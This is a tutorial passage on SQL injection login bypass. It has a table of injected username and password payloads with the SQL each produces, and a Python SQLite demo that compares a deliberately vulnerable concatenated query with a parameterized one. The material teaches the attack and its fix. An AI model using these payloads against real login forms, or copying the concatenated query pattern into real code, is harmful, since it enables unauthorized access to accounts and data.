User name | Password |
---|---|
admin | admin |
tom | tom |
ron | ron |
When a user enters a user name and password, the application builds a SQL query from those two values and runs it against the database to verify them. The first query in the table below searches the users table for a row where name is tom and password is tom. If a matching row is found, the user is authenticated.
To bypass this check, SQL code has to be injected into the input fields. The injected text must be chosen so that the resulting SQL statement is still syntactically valid and produces a result when executed. A query with a syntax error does not fetch a valid result, so typing random SQL fragments into the form and submitting it will not usually lead to successful authentication.
User name | Password | SQL Query |
---|---|---|
tom | tom | SELECT * FROM users WHERE name=("tom") AND password=("tom") |
tom | ") or 1=("1 | SELECT * FROM users WHERE name=("tom") AND password=("") OR 1=("1") |
tom | ") or 1=(1)-- - | SELECT * FROM users WHERE name=("tom") AND password=("") OR 1=(1)-- -") |
") or 1=("1 | ") or 1=("1 | SELECT * FROM users WHERE name=("") OR 1=("1") AND password=("") OR 1=("1") |
") or 1=("1")-- - | blah | SELECT * FROM users WHERE name=("") OR 1=("1") -- -") and password=("blah") |
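The following is an added example, not code from the original page: it rebuilds the sample users table in an in-memory SQLite database and runs the login check twice, once with the string-concatenated query described above and once with a parameterized query, so the two results can be compared on the same inputs. Two adaptations are assumptions of the example rather than taken from the page: string literals are single-quoted because SQLite treats double quotes as identifiers, and only the comment-terminated `1=(1)` rows of the table are used, because SQLite does not treat the integer 1 as equal to the text '1' (MySQL does), so the `1=("1")` variants would evaluate to false there. The `compare` helper and the `CASES` inputs are constructed for the demonstration.

```python
import sqlite3

# Constructed sample data: the users table shown on the page.
USERS = [("admin", "admin"), ("tom", "tom"), ("ron", "ron")]


def make_db():
    """Create an in-memory SQLite database holding the sample users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def build_query(name, password):
    """The string-concatenated query the page describes, with single-quoted
    literals instead of the page's double quotes (SQLite reads double quotes
    as identifiers). Kept separate so the SQL text a payload produces can be
    inspected before it is executed."""
    return ("SELECT * FROM users WHERE name=('%s') AND password=('%s')"
            % (name, password))


def login_vulnerable(conn, name, password):
    """Authenticate by executing the concatenated query.
    Returns the name of the first matched row, or None on failure."""
    row = conn.execute(build_query(name, password)).fetchone()
    return row[0] if row else None


def login_parameterized(conn, name, password):
    """Same check with bound parameters: the driver passes the inputs as
    data, so quote characters and comment markers inside them are compared
    literally and never reach the SQL parser as syntax."""
    row = conn.execute(
        "SELECT * FROM users WHERE name=(?) AND password=(?)",
        (name, password),
    ).fetchone()
    return row[0] if row else None


def compare(name, password, conn=None):
    """Run both login routines on the same inputs (helper constructed for
    this example). Returns (vulnerable_result, parameterized_result)."""
    conn = conn or make_db()
    return (login_vulnerable(conn, name, password),
            login_parameterized(conn, name, password))


# Constructed inputs: the legitimate login, the two comment-terminated
# payloads from the table (quote character adapted), and a wrong password.
CASES = [
    ("tom", "tom"),
    ("tom", "') or 1=(1)-- -"),       # payload in the password field
    ("') or 1=(1)-- -", "blah"),      # payload in the user name field
    ("ron", "wrong"),
]

if __name__ == "__main__":
    conn = make_db()
    for name, password in CASES:
        print(build_query(name, password))
        vulnerable, parameterized = compare(name, password, conn)
        print("  concatenated  ->", vulnerable)
        print("  parameterized ->", parameterized)
```

Because AND binds tighter than OR, the injected `OR 1=(1)` in either field makes the WHERE clause true for every row, and the trailing `-- -` comments out whatever the application appends after the payload; the concatenated version therefore returns the first row of the table (admin here) for both payloads, while the parameterized version returns nothing, since the payload is compared as an ordinary string against the stored values.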